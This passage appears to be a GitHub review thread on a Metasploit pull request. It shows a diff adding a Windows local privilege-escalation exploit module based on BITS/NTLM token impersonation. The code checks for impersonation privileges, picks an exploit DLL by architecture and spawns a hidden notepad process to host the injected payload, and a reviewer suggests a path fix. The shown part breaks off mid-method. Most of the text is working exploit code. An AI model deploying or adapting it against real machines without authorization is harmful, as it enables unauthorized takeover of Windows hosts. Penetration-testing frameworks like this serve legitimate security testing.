modules/exploits/windows/local/bits_ntlm_token_impersonation.rb

```diff
@@ -0,0 +1,162 @@
+                'splinter_code',
+                '0xea31',
+            ],
+        'Arch'           => [ARCH_X86, ARCH_X64],
+        'Platform'       => 'win',
+        'SessionTypes'   => ['meterpreter'],
+        'DefaultOptions' =>
+            {
+                'EXITFUNC' => 'none',
+                'WfsDelay' => '20'
+            },
+        'Targets'        =>
+            [
+                ['Automatic', {}]
+            ],
+        'Payload'         =>
+            {
+                'Space'       => 2048,
+                'DisableNops' => true,
+                'BadChars'    => "\x00"
+            },
+        'References'      =>
+            [
+                ['URL', 'https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/'],
+                ['URL', 'https://github.com/antonioCoco/RogueWinRM'],
+            ],
+        'DisclosureDate' => 'Dec 06 2019',
+        'DefaultTarget'  => 0
+    }))
+  end
+
+
+
+  def check
+    os = client.sys.config.sysinfo['OS']
+    build = os.match(/Build (\d+)/)
+    privs = client.sys.config.getprivs
+    # Fast fails
+    if !((privs.include?('SeImpersonatePrivilege')) || (privs.include?('SeAssignPrimaryTokenPrivilege')))
+      print_bad("Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.")
+      return Exploit::CheckCode::Safe
+    end
+    if (os =~ /Server/)
+      print_bad("Windows servers are not vulnerable.")
+      return Exploit::CheckCode::Safe
+    end
+    # Windows 10 after build 17134 (April 2018 update, version 1803) is not
+    # vulnerable. Due to changes in OS names, detecting the difference between
+    # Server 2016/19 is most reliably done with build numbers:
+    # (https://github.com/rapid7/metasploit-payloads/pull/355)
+    print_good("Target appears to be vulnerable (#{os})")
+    return Exploit::CheckCode::Appears
+  end
+
+
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Target appears not to be vulnerable.')
+    end
+
+    @payload_name = datastore['PAYLOAD']
+    @payload_arch = framework.payloads.create(@payload_name).arch
+    if @payload_arch.first == ARCH_X64
+      dll_file_name = 'drunkpotato.x64.dll'
+      vprint_status("Assigning payload drunkpotato.x64.dll")
+    elsif @payload_arch.first == ARCH_X86
+      dll_file_name = 'drunkpotato.x86.dll'
+      vprint_status("Assigning payload drunkpotato.x86.dll")
+    else
+      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
+    end
+    library_path = ::File.join(Msf::Config.data_directory, "exploits", "drunkpotato", dll_file_name)
+    library_path = ::File.expand_path(library_path)
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
```

Comment:
We can use the `Msf::Post::Windows::Process` mixin to make sure we get the right notepad executed.
```suggestion
    notepad_path = get_notepad_pathname(client.sys.config.sysinfo['Architecture'], client.sys.config.getenv('windir'), @payload_arch.first)
    notepad_process = client.sys.process.execute(notepad_path, nil, {'Hidden' => true})
```

Reply:
Fixed by commit [ad74428f6b706b1991d35afab1abed9208228308](https://github.com/rapid7/metasploit-framework/pull/14046/commits/ad74428f6b706b1991d35afab1abed9208228308)